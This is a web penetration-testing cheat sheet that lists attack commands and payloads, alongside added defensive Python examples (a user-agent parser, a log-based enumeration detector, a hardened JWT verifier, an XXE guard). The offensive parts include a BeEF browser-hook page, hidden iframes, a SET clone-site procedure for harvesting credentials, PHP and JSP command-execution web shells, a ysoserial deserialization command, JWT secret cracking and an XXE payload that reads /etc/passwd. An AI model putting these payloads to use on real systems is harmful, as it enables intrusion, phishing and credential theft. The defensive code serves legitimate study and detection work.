the Web

Common user-agents

Internet Explorer (6.0, 7.0, 8.0, 9.0)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IE 6.0/WinXP 32-bit
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
IE 7.0/WinXP 32-bit
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)
IE 8.0/WinVista 32-bit
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
IE 9.0/Win7 32-bit
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
IE 9.0/Win7 64-bit

Firefox (5.0, 13.0, 17.0)

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Firefox 5.0/Win7 64-bit
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Firefox 13.0/WinXP 32-bit
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0
Firefox 17/Win7 64-bit
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Firefox 17.0/Linux
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:17.0) Gecko/20100101 Firefox/17.0
Firefox 17.0/MacOSX 10.7
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:17.0) Gecko/20100101 Firefox/17.0
Firefox 17.0/MacOSX 10.8

Chrome (Generic 13.0)

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Chrome Generic/WinXP
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Chrome Generic/Win7
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Chrome Generic/Linux
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11
Chrome Generic/MacOSX
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Chrome 13.0/Win7 64-bit

Safari (6.0)

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
Safari 6.0/MacOSX

Mobile safari (4.0 & 6.0)

Mozilla/5.0 (iPad; CPU OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A523 Safari/8536.25
Mobile Safari 6.0/iOS (iPad)
Mozilla/5.0 (iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A523 Safari/8536.25
Mobile Safari 6.0/iOS (iPhone)
Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Mobile Safari 4.0/Android
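The list above is most useful on the analysis side, when the User-Agent column of an access log has to be reduced to browser, version, OS and bitness for tallying or for spotting clients that claim one platform and behave like another. The parser below is an added example, not part of the original cheat sheet; it handles exactly the families in the list (IE with its nested MSIE fragment, Firefox, Chrome, desktop and Mobile Safari) and the sample strings inside it are re-typed copies of rows from the table. The Windows NT version map and the "32-bit unless a 64-bit token is present" rule are assumptions that match the table's own labels.

```python
import re
from collections import Counter

# Windows NT kernel versions -> marketing names for the platforms in the table above
WINDOWS_NT = {"5.0": "Windows 2000", "5.1": "Windows XP", "6.0": "Windows Vista", "6.1": "Windows 7"}

# Constructed sample: copies of rows from the table, used by the demo and the checks
SAMPLE_UAS = [
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11",
    "Mozilla/5.0 (iPad; CPU OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A523 Safari/8536.25",
    "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17",
]


def parse_user_agent(ua: str) -> dict:
    """Reduce a User-Agent string to browser, version, OS and bitness.

    Order matters: Chrome also carries a 'Safari/' token, IE 8 embeds an older
    'MSIE 6.0' fragment after its own, and iOS strings contain 'like Mac OS X',
    so each family is tested in an order where the first hit is the right one.
    """
    browser, version = "unknown", "unknown"
    for name, pattern in (
        ("IE", r"MSIE (\d+\.\d+)"),
        ("Firefox", r"Firefox/(\d+\.\d+)"),
        ("Chrome", r"Chrome/(\d+\.\d+)"),
        ("Mobile Safari", r"Version/(\d+\.\d+)(?=.*Mobile.*Safari/)"),
        ("Safari", r"Version/(\d+\.\d+)(?=.*Safari/)"),
    ):
        m = re.search(pattern, ua)
        if m:
            browser, version = name, m.group(1)
            break

    os_name = "unknown"
    if (m := re.search(r"Windows NT (\d+\.\d+)", ua)):
        os_name = WINDOWS_NT.get(m.group(1), f"Windows NT {m.group(1)}")
    elif (m := re.search(r"\b(iPhone|iPad)\b", ua)):       # before the Mac check
        os_name = f"iOS ({m.group(1)})"
    elif (m := re.search(r"Android ([\d.]+)", ua)):
        os_name = f"Android {m.group(1)}"
    elif (m := re.search(r"Mac OS X (\d+)[._](\d+)", ua)):
        os_name = f"Mac OS X {m.group(1)}.{m.group(2)}"
    elif "Linux" in ua:
        os_name = "Linux"

    if re.search(r"WOW64|Win64|x86_64", ua):
        arch = "64-bit"
    elif os_name.startswith("Windows") or os_name == "Linux":
        arch = "32-bit"    # assumption: no 64-bit token on a platform that advertises one
    else:
        arch = "unknown"
    return {"browser": browser, "version": version, "os": os_name, "arch": arch}


def tally(user_agents) -> Counter:
    """Count (browser, os) pairs, e.g. over the User-Agent column of an access log."""
    return Counter((r["browser"], r["os"]) for r in map(parse_user_agent, user_agents))


if __name__ == "__main__":
    for ua in SAMPLE_UAS:
        print(parse_user_agent(ua))
    print(tally(SAMPLE_UAS))
```

A mismatch between what this returns and what the connection otherwise reveals (TLS fingerprint, Accept-Language, request timing) is the usual tell that the string was copied from a list like the one above rather than sent by a real browser.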

HTML language

BeEF hook code embedded in iframe

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">
<html>
<head>
<title>Campaign Title</title>
<script>
var commandModuleStr = '<script src="' + window.location.protocol +
'//' + window.location.host + ':8080/hook.js"
type="text/javascript"><\/script>';
//Site refresh=window.setTimeout(function() {window.location.href='http://ww'},20000);
</script>
</head>
<frameset rows="*,1px">
<frame src="" frameborder=0 noresize="noresize" />
<frame src="/e" frameborder=0 scrolling=no noresize=noresize />
</frameset>
</html>

Embedded Java applet code (must be placed inside <body>)

<applet archive="legit.jar" code="This is a legit applet" width="1"></applet>

Embedded iframe

<iframe src="" width="0" height="0" frameborder="0"
tabindex="-1" title="empty" style="visibility:hidden;display:none"></iframe>

Firefox conversion methods (typed into the URL bar)

ASCII -> Base64: javascript:btoa("ascii str")
Base64 -> ASCII: javascript:atob("base64==")
ASCII -> URI: javascript:encodeURI("<script>")
URI -> ASCII: javascript:decodeURI("%3cscript%3E")

Wget command

Log in and save the session cookie (session token recording)

wget -q --save-cookies=cookie.txt --keep-session-cookies --post-data="username=admin&password=pass&Login=Login" http://url/login.php

Curl command

Get web page headers while presenting a chosen user agent

curl -I -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" http://<ip>

Get the page after authentication

curl -u user:pass -o outfile <url>

Ftp command

curl ftp://user:pass@<ip>/directory/

Check different files


Creating Basic authentication in apache2

The steps below will clone a website and redirect after 3 seconds to
another page requiring basic authentication. It has proven very useful for
collecting credentials during social engineering engagements.
1. Start Social Engineering Toolkit (SET)
2. Through SET, use the 'Website Attack Vector' menu to clone your
preferred website. Do not close SET.
3. In a new terminal create a new directory (lowercase L)
mkdir /var/www/l
4. Browse to the SET directory and copy the cloned site
cd /pentest/exploits/set/src/web_clone/site/template/
cp index.html /var/www/index.html
cp index.html /var/www/l/index.html
5. Open /var/www/index.html and add this tag between the <head> tags
<meta http-equiv="refresh" content="3;url=http://<domain or ip>/l/index.html"/>
6. Create a blank password file to be used for basic auth
touch /etc/apache2/.htpasswd
7. Open /etc/apache2/sites-available/default and add (Apache refuses Basic auth without an AuthName):
<Directory /var/www/l>
AuthType Basic
AuthName "Authentication Required"
AuthUserFile /etc/apache2/.htpasswd
Require user test
</Directory>
8. Start Apache2
/etc/init.d/apache2 start
9. Start Wireshark and add the filter:
10. Send the following link to your target users

Automate screenshots of web pages

Using nmap

Install dependencies:
wget rc1-
tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
cp wkhtmltoimage-i386 /usr/local/bin/
Install the Nmap module:
git clone git://
cd Nmap-Tools/NSE/
cp http-screenshot.nse /usr/local/share/nmap/scripts/
nmap --script-updatedb
OS/version detection using the screenshot script (screenshots saved as .png):
nmap -A --script=http-screenshot -p80,443 -oA nmap-
Generate an HTML preview page with all screenshots:
printf "<HTML><BODY><BR>" > preview.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>" }' >> preview.html
printf "</BODY></HTML>" >> preview.html

Peepingtom command

Installation Dependencies:
Download Phantomjs
Download PeepingTom
git clone
Extract and copy phantomjs from phantomjs-1.9.2-linux-x86_64.tar.bz2 and
copy to peepingtom directory
Run PeepingTom
python http://

Injection of different payloads with wfuzz

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt --hc 404

Guess different files with specific extensions with wfuzz

wfuzz -w /usr/share/wordlists/big.txt -u http://admirer.htb/admin/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c

Guess values in POST requests

wfuzz -X POST -u 'http://quick.htb/login.php' -w elist.txt -d 'email=FUZZ&password=123456' --hc 200 -c

Guess web paths with ffuf

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://<target>/FUZZ

Guess subdomains with gobuster

gobuster dns -t 50 -d <domain> -w ~/seclists/Dir/subdomains.dat

Guess subdomains (virtual hosts) with ffuf

ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<target> -H "Host: FUZZ.<domain>"

Find subdomain based on certificates
assetfinder --subs-only <domain> | httprobe
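Seen from the server, every wordlist-driven command in the sections above leaves the same shape in the access log: one client, many distinct paths, a high 404 share (path and extension guessing), or many POSTs to a single path with nothing else in between (parameter and credential guessing). The detector below is an added example, not part of the original cheat sheet; it parses Apache/nginx combined-format lines and flags a client on either pattern, and also generalises slightly by using the default User-Agent prefixes of ffuf and wfuzz as a secondary signal. The log lines are constructed, the thresholds are assumptions to be tuned per site.

```python
import re
from collections import Counter, defaultdict

# Apache/nginx "combined" access log line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Default User-Agent prefixes of ffuf and wfuzz. One flag overrides them, so a hit
# is corroboration only; the request pattern is the primary signal.
TOOL_UA_MARKERS = ("Fuzz Faster U Fool", "Wfuzz/")

# Constructed sample: a path-guessing client, a credential-guessing client, a real user.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /admin/backup.php HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v1.5.0"
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /admin/config.txt HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v1.5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /admin/index.php HTTP/1.1" 200 2311 "-" "Fuzz Faster U Fool v1.5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /admin/test.php HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v1.5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /admin/old.txt HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v1.5.0"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /admin/db.php HTTP/1.1" 404 196 "-" "Fuzz Faster U Fool v1.5.0"
192.0.2.9 - - [10/Oct/2023:14:01:10 +0000] "POST /login.php HTTP/1.1" 200 1042 "-" "python-requests/2.28.1"
192.0.2.9 - - [10/Oct/2023:14:01:10 +0000] "POST /login.php HTTP/1.1" 200 1042 "-" "python-requests/2.28.1"
192.0.2.9 - - [10/Oct/2023:14:01:11 +0000] "POST /login.php HTTP/1.1" 200 1042 "-" "python-requests/2.28.1"
192.0.2.9 - - [10/Oct/2023:14:01:11 +0000] "POST /login.php HTTP/1.1" 200 1042 "-" "python-requests/2.28.1"
192.0.2.9 - - [10/Oct/2023:14:01:12 +0000] "POST /login.php HTTP/1.1" 200 1042 "-" "python-requests/2.28.1"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "http://example.test/index.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"
198.51.100.7 - - [10/Oct/2023:13:56:05 +0000] "GET /about.html HTTP/1.1" 200 3120 "http://example.test/index.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"
"""


def parse_lines(text):
    """Yield one dict per well-formed combined-log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def flag_enumeration(log_text, min_requests=5, notfound_ratio=0.7):
    """Return {ip: [reason, ...]} for clients whose traffic looks like wordlist guessing."""
    stats = defaultdict(lambda: {"total": 0, "notfound": 0, "paths": set(),
                                 "posts": Counter(), "tool_ua": False})
    for rec in parse_lines(log_text):
        s = stats[rec["ip"]]
        s["total"] += 1
        s["paths"].add(rec["path"])
        if rec["status"] == "404":
            s["notfound"] += 1
        if rec["method"] == "POST":
            s["posts"][rec["path"]] += 1
        if rec["ua"].startswith(TOOL_UA_MARKERS):
            s["tool_ua"] = True

    findings = {}
    for ip, s in stats.items():
        reasons = []
        if s["total"] >= min_requests and s["notfound"] / s["total"] >= notfound_ratio:
            reasons.append(f"{s['notfound']}/{s['total']} responses were 404 across "
                           f"{len(s['paths'])} distinct paths (path/file guessing)")
        for path, n in s["posts"].items():
            if n >= min_requests:
                reasons.append(f"{n} POST requests to {path} (parameter/credential guessing)")
        if s["tool_ua"]:
            reasons.append("User-Agent matches a fuzzing tool default")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in flag_enumeration(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

In production the counts should be kept per sliding window rather than per file, and the 404 ratio should exclude paths the application itself is known to miss (favicon, apple-touch-icon) so a single real user with a broken bookmark does not trip it.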

Injection of PHP inside a JPEG (comment field)

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' me.jpg

Exploit deserialization of Java programs

java -jar ysoserial.jar CommonsBeanutils1 'COMMAND' | base64 -w0

Famous web shells

Extracting the structure of folders and files from .git

Extract information from .git
./ /tmp/mygitrepo /tmp/mygitrepodump

Extract information from .DS_Store

1. Find the directory structure
python2.7 http://poo.htb/.DS_Store
2. Enumerate the found path (IIS short-name scanner)
java -jar iis_shortname_scanner.jar 2 20 http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/

Extracting page parameters

python3 --domain --exclude woff,css,js,png,svg,php,jpg --output bugcrowd.txt

Filter collected URLs by parameter patterns that match vulnerability classes (gf)

gf xss domain.txt
gf potential domain.txt

Guess the JWT symmetric (HMAC) signing secret

jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

Recover the JWT public key (asymmetric signing) from two tokens

docker run --rm -it portswigger/sig2n <token1> <token2>
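Both of the JWT commands above work against the verifier's side of the contract: jwt-cracker succeeds when the HS256 secret is short enough to enumerate, and sig2n recovers a public key that only matters if the verifier can be talked into treating it as an HMAC secret. The code below is an added example, not part of the original cheat sheet; it signs and verifies HS256 tokens with only the standard library, pins the algorithm in the verifier instead of reading it from the token header, uses a constant-time comparison, and checks the key length floor from RFC 7518 section 3.2 (256 bits for HS256). The secret and claims are constructed; nothing here is tied to the token in the jwt-cracker line.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo secret (36 bytes). A six-character secret, the search space the
# jwt-cracker invocation above covers, is far below the 256-bit floor of RFC 7518.
DEMO_SECRET = b"constructed-demo-secret-0123456789ab"


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def secret_is_strong(secret: bytes) -> bool:
    """Minimum HS256 key length from RFC 7518 section 3.2 (256 bits)."""
    return len(secret) >= 32


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a compact-serialisation HS256 token for the given claims."""
    header = {"alg": "HS256", "typ": "JWT"}
    segments = [b64url_encode(json.dumps(part, separators=(",", ":")).encode())
                for part in (header, payload)]
    signing_input = ".".join(segments).encode("ascii")
    tag = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return ".".join(segments + [b64url_encode(tag)])


def verify_hs256(token: str, secret: bytes) -> dict:
    """Verify an HS256 token and return its claims; raise ValueError otherwise.

    The algorithm is fixed by this verifier, never taken from the token, so a
    header claiming "none", or claiming "HS256" on a service that actually issues
    RS256 tokens, is rejected before any signature arithmetic happens. That is the
    server-side answer to the sig2n key-recovery technique.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    token = sign_hs256({"sub": "1234567890", "name": "John Doe", "admin": False}, DEMO_SECRET)
    print(token)
    print(verify_hs256(token, DEMO_SECRET))
    print("secret strong enough:", secret_is_strong(DEMO_SECRET))
```

A real deployment would additionally check `exp`/`nbf` and the intended audience, and would load the secret from a key store rather than a constant; the point here is the shape of the verifier, not the key management.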

Create web shell jpg

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' meme.jpg

Create web shell jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

Read file with XXE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE abc [
<!ENTITY ab SYSTEM "file:///etc/passwd">
]>
<root><name>&ab;</name><tel>demo</tel><email>demo@demo.com</email><password>demo</password></root>
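The document above works because the parser honours the DOCTYPE, declares the external entity and substitutes the file contents where `&ab;` appears. A service that accepts XML from clients should refuse the document at the first of those steps, before any entity exists to expand. The guard below is an added example, not part of the original cheat sheet: it runs expat with its declaration callbacks (`StartDoctypeDeclHandler`, `EntityDeclHandler`, `ExternalEntityRefHandler`) wired to raise, so any DTD, entity declaration or external reference is reported as a reason string, and only a clean document is handed to `ElementTree`. The sample documents are constructed copies modelled on the payload above.

```python
import xml.parsers.expat
from xml.etree import ElementTree as ET


class UnsafeXML(ValueError):
    """Raised when a document carries a DTD, an entity declaration or an external reference."""


# Constructed samples: the XXE document from this page, and a clean one.
XXE_SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE abc [
<!ENTITY ab SYSTEM "file:///etc/passwd">
]>
<root><name>&ab;</name><tel>demo</tel><email>demo@demo.com</email><password>demo</password></root>"""

CLEAN_SAMPLE = b"<root><name>demo</name><tel>demo</tel><email>demo@demo.com</email></root>"


def xml_guard_reason(data: bytes):
    """Return None if the document has no DTD/entity constructs, else a reason string.

    expat calls the declaration handlers as soon as it tokenises the DOCTYPE, before
    any entity value is resolved, so raising from them stops the parse with nothing
    expanded and nothing fetched.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE declaration for <{name}> "
                        f"(internal subset: {bool(has_internal_subset)}, system id: {sysid!r})")

    def on_entity(name, is_parameter, value, base, sysid, pubid, notation):
        kind = "external" if (sysid or pubid) else "internal"
        raise UnsafeXML(f"{kind} entity declaration {name!r}")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity reference to {sysid!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except UnsafeXML as exc:
        return str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return f"not well-formed: {exc}"
    return None


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse client-supplied XML only after the guard has cleared it."""
    reason = xml_guard_reason(data)
    if reason is not None:
        raise UnsafeXML(reason)
    return ET.fromstring(data)


if __name__ == "__main__":
    print("xxe sample  ->", xml_guard_reason(XXE_SAMPLE))
    print("clean sample->", xml_guard_reason(CLEAN_SAMPLE))
    print(parse_untrusted(CLEAN_SAMPLE).find("name").text)
```

Rejecting the DOCTYPE outright also closes the internal-entity expansion ("billion laughs") variant, which needs no external reference at all. CPython's own `xml.etree` does not fetch external entities, but parsers that do (lxml with its default `resolve_entities=True`, and most Java and .NET parsers before hardening) are exactly where the payload above lands, and a pre-parse guard like this one is parser-independent.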